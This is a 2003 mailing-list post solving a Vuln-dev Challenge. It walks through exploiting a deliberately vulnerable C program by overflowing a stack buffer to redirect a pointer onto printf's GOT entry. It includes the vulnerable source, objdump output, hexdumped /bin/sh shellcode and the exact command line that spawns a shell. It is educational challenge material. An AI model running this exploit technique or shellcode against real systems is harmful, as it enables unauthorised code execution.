The strategy was to overwrite the printf pointer with the shellcode address.

1) Overwrite the pointer held in bfp via strcpy(buf, argv[1]).
   before: [buf][bfp][ret]
   after:  [buf][&printf - 2][ret]
   Subtract 2 from the printf addr to compensate for ";;%s;;" in fprintf.

2) Overwrite the printf function pointer with argv[2] via fgets(bfp, BFSIZE, f1); f1 contains the address of argv[1] or buf.

3) printf is then called, which gives a shell.

Note that a BFSIZE of 90 actually allocates 92 bytes on the stack.

/* vulndev2.c */

#include <stdio.h>
#include <stdlib.h>

#define BFSIZE 90

int main(int argc, char *argv[])
{
	char *bfp;
	char buf[BFSIZE];
	FILE *f1;

	if (argc != 3)
		return 1;
	if ( (bfp = malloc(BFSIZE)) == NULL)
		return 1;

	/* debug */
	printf("bfp = %p, buf = %p\n", bfp, buf);

	/* log input */
	if ( (f1 = fopen("db.log", "a+")) == NULL)
		return 1;
	fprintf(f1, ";;%s;;", argv[2]);
	fclose(f1);

	strcpy(buf, argv[1]);

	/* read log */
	if ( (f1 = fopen("db.log", "r")) == NULL)
		return 1;
	if (fgets(bfp, BFSIZE, f1) == NULL)
		return 1;

	printf("%s\n", bfp);
	fclose(f1);
	exit(1);
}

##

jroyes@tadpole:~/study/vuln-dev/cha2$ objdump -R vd2

vd2:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049874 R_386_GLOB_DAT    __gmon_start__
08049848 R_386_JUMP_SLOT   __register_frame_info
0804984c R_386_JUMP_SLOT   fprintf
08049850 R_386_JUMP_SLOT   malloc
08049854 R_386_JUMP_SLOT   __deregister_frame_info
08049858 R_386_JUMP_SLOT   fgets
0804985c R_386_JUMP_SLOT   __libc_start_main
08049860 R_386_JUMP_SLOT   printf
08049864 R_386_JUMP_SLOT   fclose
08049868 R_386_JUMP_SLOT   exit
0804986c R_386_JUMP_SLOT   fopen
08049870 R_386_JUMP_SLOT   strcpy

jroyes@tadpole:~/study/vuln-dev/cha2$ hexdump -C tiny.shell
00000000  31 db 31 c9 b0 46 cd 80  31 c0 50 68 2f 73 68 ff  |1.1..F..1.Ph/sh.|
00000010  88 44 24 03 68 2f 62 69  6e 89 e3 50 53 89 e1 31  |.D$.h/bin..PS..1|
00000020  d2 b0 0b cd 80                                    |.....|
00000025

jroyes@tadpole:~/study/vuln-dev/cha2$ ./vd2 `perl -e 'print "A"x55'``cat tiny.shell``printf "\x5e\x98\x04\x08"` `printf "\x6c\xfa\xff\xbf"`
bfp = 
0x8049898, buf = 0xbffffa6c
sh-2.05a$ exit
jroyes@tadpole:~/study/vuln-dev/cha2$

##

Thanks to sin for the tiny shellcode.

On Fri, 2003-05-23 at 18:13, Dave McKinney wrote:
>
> We are announcing the second challenge. Initially, we wanted to have this
> out a few days ago but were involved in testing it on multiple platforms.
> This challenge is a little easier than the first one, since we'd like to
> see more people attempting to produce a proof-of-concept. If you find it
> too easy, you're welcome to attempt it in an environment with a
> non-executable stack/heap to raise the bar a little.
>
> Here's a link to the basic guidelines (for those who missed it):
>
> http://www.securityfocus.com/archive/82/321615/2003-05-13/2003-05-19/0
>
> (also, please retain the [Vuln-dev Challenge] string in the subject line
> for replies to make for easier filtering for those not interested in
> challenge related discussion.)
>
> ---
>
> /* vulndev2.c */
>
> #include <stdio.h>
> #include <stdlib.h>
>
> #define BFSIZE 90
>
> int
> main(int argc, char *argv[])
> {
> 	char *bfp;
> 	char buf[BFSIZE];
> 	FILE *f1;
>
> 	if (argc != 3)
> 		return 1;
> 	if ( (bfp = malloc(BFSIZE)) == NULL)
> 		return 1;
>
> 	/* log input */
> 	if ( (f1 = fopen("db.log", "a+")) == NULL)
> 		return 1;
> 	fprintf(f1, ";;%s;;", argv[2]);
> 	fclose(f1);
>
> 	strcpy(buf, argv[1]);
>
> 	/* read log */
> 	if ( (f1 = fopen("db.log", "r")) == NULL)
> 		return 1;
> 	if (fgets(bfp, BFSIZE, f1) == NULL)
> 		return 1;
>
> 	printf("%s\n", bfp);
> 	fclose(f1);
> 	exit(1);
> }
>
> ---
>
> Dave McKinney
> Symantec
>
> keyID: BF919DD7
> key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7

-- 
Jason Royes
Data Access Experts
http://www.da-experts.com/